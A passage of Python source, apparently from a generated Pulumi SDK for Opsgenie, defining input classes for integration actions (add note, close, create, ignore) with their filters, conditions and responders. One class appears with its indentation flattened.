    @pulumi.getter
    def user(self) -> Optional[pulumi.Input[str]]:
        """Owner of the execution for integration action."""
        return pulumi.get(self, "user")

    @user.setter
    def user(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionAddNoteFilterArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterConditionArgs']]]] = None):
        """
        Alert filter attached to an "add note" integration action.

        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        pulumi.set(__self__, "type", type)
        # `conditions` is only stored when explicitly supplied.
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterConditionArgs']]]]:
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionAddNoteFilterConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        A single condition of an "add note" action's alert filter.

        :param pulumi.Input[bool] not_: Serialized to the wire name `not` (see
               the getter decorator); presumably negates the condition —
               confirm against the provider schema.
        :param pulumi.Input[int] order: Integer value that defines in which
               order the action will be performed. Default: `1`.
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (
            ("expected_value", expected_value),
            ("key", key),
            ("not_", not_),
            ("order", order),
        ):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionCloseArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 alias: Optional[pulumi.Input[str]] = None,
                 filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]]] = None,
                 note: Optional[pulumi.Input[str]] = None,
                 order: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 user: Optional[pulumi.Input[str]] = None):
        """
        A "close" action of an Opsgenie integration.

        :param pulumi.Input[str] name: Name of the integration action.
        :param pulumi.Input[str] alias: Identifier used for alert deduplication. Default: `{{alias}}`.
        :param pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]] filters: Rules for matching alerts and the filter type. The field names usable in filter conditions depend on the integration type:
               * For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
               * For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
               * For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
        :param pulumi.Input[str] note: Additional alert action note.
        :param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        :param pulumi.Input[str] user: Owner of the execution for integration action.
        """
        pulumi.set(__self__, "name", name)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (
            ("alias", alias),
            ("filters", filters),
            ("note", note),
            ("order", order),
            ("type", type),
            ("user", user),
        ):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """Name of the integration action."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def alias(self) -> Optional[pulumi.Input[str]]:
        """Identifier used for alert deduplication. Default: `{{alias}}`."""
        return pulumi.get(self, "alias")

    @alias.setter
    def alias(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "alias", value)

    @property
    @pulumi.getter
    def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]]]:
        """
        Rules for matching alerts and the filter type. The field names usable in
        the conditions depend on the integration type (SNS / API / Email) — see
        the constructor docstring for the per-type lists.
        """
        return pulumi.get(self, "filters")

    @filters.setter
    def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]]]):
        pulumi.set(self, "filters", value)

    @property
    @pulumi.getter
    def note(self) -> Optional[pulumi.Input[str]]:
        """Additional alert action note."""
        return pulumi.get(self, "note")

    @note.setter
    def note(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "note", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def user(self) -> Optional[pulumi.Input[str]]:
        """Owner of the execution for integration action."""
        return pulumi.get(self, "user")

    @user.setter
    def user(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionCloseFilterArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterConditionArgs']]]] = None):
        """
        Alert filter attached to a "close" integration action.

        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        pulumi.set(__self__, "type", type)
        # `conditions` is only stored when explicitly supplied.
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterConditionArgs']]]]:
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionCloseFilterConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        A single condition of a "close" action's alert filter.

        :param pulumi.Input[bool] not_: Serialized to the wire name `not` (see
               the getter decorator); presumably negates the condition —
               confirm against the provider schema.
        :param pulumi.Input[int] order: Integer value that defines in which
               order the action will be performed. Default: `1`.
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (
            ("expected_value", expected_value),
            ("key", key),
            ("not_", not_),
            ("order", order),
        ):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionCreateArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alert_actions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
alias: Optional[pulumi.Input[str]] = None,
append_attachments: Optional[pulumi.Input[bool]] = None,
custom_priority: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
entity: Optional[pulumi.Input[str]] = None,
extra_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]]] = None,
ignore_alert_actions_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_extra_properties_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_responders_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_tags_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_teams_from_payload: Optional[pulumi.Input[bool]] = None,
message: Optional[pulumi.Input[str]] = None,
note: Optional[pulumi.Input[str]] = None,
order: Optional[pulumi.Input[int]] = None,
priority: Optional[pulumi.Input[str]] = None,
responders: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]]] = None,
source: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
type: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the integration action.
:param pulumi.Input[str] alias: An identifier that is used for alert deduplication. Default: `{{alias}}`.
:param pulumi.Input[str] custom_priority: Custom alert priority. e.g. ``{{message.substring(0,2)}}``
:param pulumi.Input[str] description: Detailed description of the alert, anything that may not have fit in the `message` field.
:param pulumi.Input[str] entity: The entity the alert is related to.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] extra_properties: Set of user defined properties specified as a map.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
:param pulumi.Input[bool] ignore_responders_from_payload: If enabled, the integration will ignore responders sent in request payloads.
:param pulumi.Input[bool] ignore_teams_from_payload: If enabled, the integration will ignore teams sent in request payloads.
:param pulumi.Input[str] message: Alert text limited to 130 characters.
:param pulumi.Input[str] note: Additional alert action note.
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
:param pulumi.Input[str] priority: Alert priority.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]] responders: User, schedule, teams or escalation names to calculate which users will receive notifications of the alert.
:param pulumi.Input[str] source: User defined field to specify source of action.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Comma separated list of labels to be attached to the alert.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
:param pulumi.Input[str] user: Owner of the execution for integration action.
"""
pulumi.set(__self__, "name", name)
if alert_actions is not None:
pulumi.set(__self__, "alert_actions", alert_actions)
if alias is not None:
pulumi.set(__self__, "alias", alias)
if append_attachments is not None:
pulumi.set(__self__, "append_attachments", append_attachments)
if custom_priority is not None:
pulumi.set(__self__, "custom_priority", custom_priority)
if description is not None:
pulumi.set(__self__, "description", description)
if entity is not None:
pulumi.set(__self__, "entity", entity)
if extra_properties is not None:
pulumi.set(__self__, "extra_properties", extra_properties)
if filters is not None:
pulumi.set(__self__, "filters", filters)
if ignore_alert_actions_from_payload is not None:
pulumi.set(__self__, "ignore_alert_actions_from_payload", ignore_alert_actions_from_payload)
if ignore_extra_properties_from_payload is not None:
pulumi.set(__self__, "ignore_extra_properties_from_payload", ignore_extra_properties_from_payload)
if ignore_responders_from_payload is not None:
pulumi.set(__self__, "ignore_responders_from_payload", ignore_responders_from_payload)
if ignore_tags_from_payload is not None:
pulumi.set(__self__, "ignore_tags_from_payload", ignore_tags_from_payload)
if ignore_teams_from_payload is not None:
pulumi.set(__self__, "ignore_teams_from_payload", ignore_teams_from_payload)
if message is not None:
pulumi.set(__self__, "message", message)
if note is not None:
pulumi.set(__self__, "note", note)
if order is not None:
pulumi.set(__self__, "order", order)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if responders is not None:
pulumi.set(__self__, "responders", responders)
if source is not None:
pulumi.set(__self__, "source", source)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if type is not None:
pulumi.set(__self__, "type", type)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the integration action.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="alertActions")
def alert_actions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "alert_actions")
@alert_actions.setter
def alert_actions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "alert_actions", value)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
An identifier that is used for alert deduplication. Default: `{{alias}}`.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter(name="appendAttachments")
def append_attachments(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "append_attachments")
@append_attachments.setter
def append_attachments(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "append_attachments", value)
@property
@pulumi.getter(name="customPriority")
def custom_priority(self) -> Optional[pulumi.Input[str]]:
"""
Custom alert priority. e.g. ``{{message.substring(0,2)}}``
"""
return pulumi.get(self, "custom_priority")
@custom_priority.setter
def custom_priority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_priority", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Detailed description of the alert, anything that may not have fit in the `message` field.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def entity(self) -> Optional[pulumi.Input[str]]:
"""
The entity the alert is related to.
"""
return pulumi.get(self, "entity")
@entity.setter
def entity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "entity", value)
@property
@pulumi.getter(name="extraProperties")
def extra_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Set of user defined properties specified as a map.
"""
return pulumi.get(self, "extra_properties")
@extra_properties.setter
def extra_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "extra_properties", value)
@property
@pulumi.getter
def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]]]:
"""
Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
"""
return pulumi.get(self, "filters")
@filters.setter
def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]]]):
pulumi.set(self, "filters", value)
@property
@pulumi.getter(name="ignoreAlertActionsFromPayload")
def ignore_alert_actions_from_payload(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "ignore_alert_actions_from_payload")
@ignore_alert_actions_from_payload.setter
def ignore_alert_actions_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_alert_actions_from_payload", value)
@property
@pulumi.getter(name="ignoreExtraPropertiesFromPayload")
def ignore_extra_properties_from_payload(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "ignore_extra_properties_from_payload")
@ignore_extra_properties_from_payload.setter
def ignore_extra_properties_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_extra_properties_from_payload", value)
@property
@pulumi.getter(name="ignoreRespondersFromPayload")
def ignore_responders_from_payload(self) -> Optional[pulumi.Input[bool]]:
"""
If enabled, the integration will ignore responders sent in request payloads.
"""
return pulumi.get(self, "ignore_responders_from_payload")
@ignore_responders_from_payload.setter
def ignore_responders_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_responders_from_payload", value)
@property
@pulumi.getter(name="ignoreTagsFromPayload")
def ignore_tags_from_payload(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "ignore_tags_from_payload")
@ignore_tags_from_payload.setter
def ignore_tags_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_tags_from_payload", value)
@property
@pulumi.getter(name="ignoreTeamsFromPayload")
def ignore_teams_from_payload(self) -> Optional[pulumi.Input[bool]]:
"""
If enabled, the integration will ignore teams sent in request payloads.
"""
return pulumi.get(self, "ignore_teams_from_payload")
@ignore_teams_from_payload.setter
def ignore_teams_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_teams_from_payload", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
"""
Alert text limited to 130 characters.
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def note(self) -> Optional[pulumi.Input[str]]:
"""
Additional alert action note.
"""
return pulumi.get(self, "note")
@note.setter
def note(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "note", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[str]]:
"""
Alert priority.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def responders(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]]]:
"""
User, schedule, teams or escalation names to calculate which users will receive notifications of the alert.
"""
return pulumi.get(self, "responders")
@responders.setter
def responders(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]]]):
pulumi.set(self, "responders", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
User defined field to specify source of action.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Comma separated list of labels to be attached to the alert.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Owner of the execution for integration action.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionCreateFilterArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterConditionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        pulumi.set(__self__, "type", type)
        if conditions is None:
            return
        pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterConditionArgs']]]]:
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionCreateFilterConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        # Optional attributes are stored only when explicitly supplied.
        for attr_name, attr_value in (
            ("expected_value", expected_value),
            ("key", key),
            ("not_", not_),
            ("order", order),
        ):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionCreateResponderArgs:
    def __init__(__self__, *,
                 id: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        :param pulumi.Input[str] id: The id of the responder.
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        # Both attributes are mandatory, so they are stored unconditionally.
        pulumi.set(__self__, "id", id)
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def id(self) -> pulumi.Input[str]:
        """The id of the responder."""
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: pulumi.Input[str]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class IntegrationActionIgnoreArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]]] = None,
                 order: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: Name of the integration action.
        :param pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
               * For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
               * For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
               * For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
        :param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        pulumi.set(__self__, "name", name)
        # Optional attributes are stored only when explicitly supplied.
        for attr_name, attr_value in (("filters", filters), ("order", order), ("type", type)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """Name of the integration action."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]]]:
        """
        Used to specify rules for matching alerts and the filter type. Please note that depending on
        the integration type the field names in the filter conditions are:
        * For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
        * For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
        * For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
        """
        return pulumi.get(self, "filters")

    @filters.setter
    def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]]]):
        pulumi.set(self, "filters", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class IntegrationActionIgnoreFilterArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterConditionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        pulumi.set(__self__, "type", type)
        if conditions is None:
            return
        pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterConditionArgs']]]]:
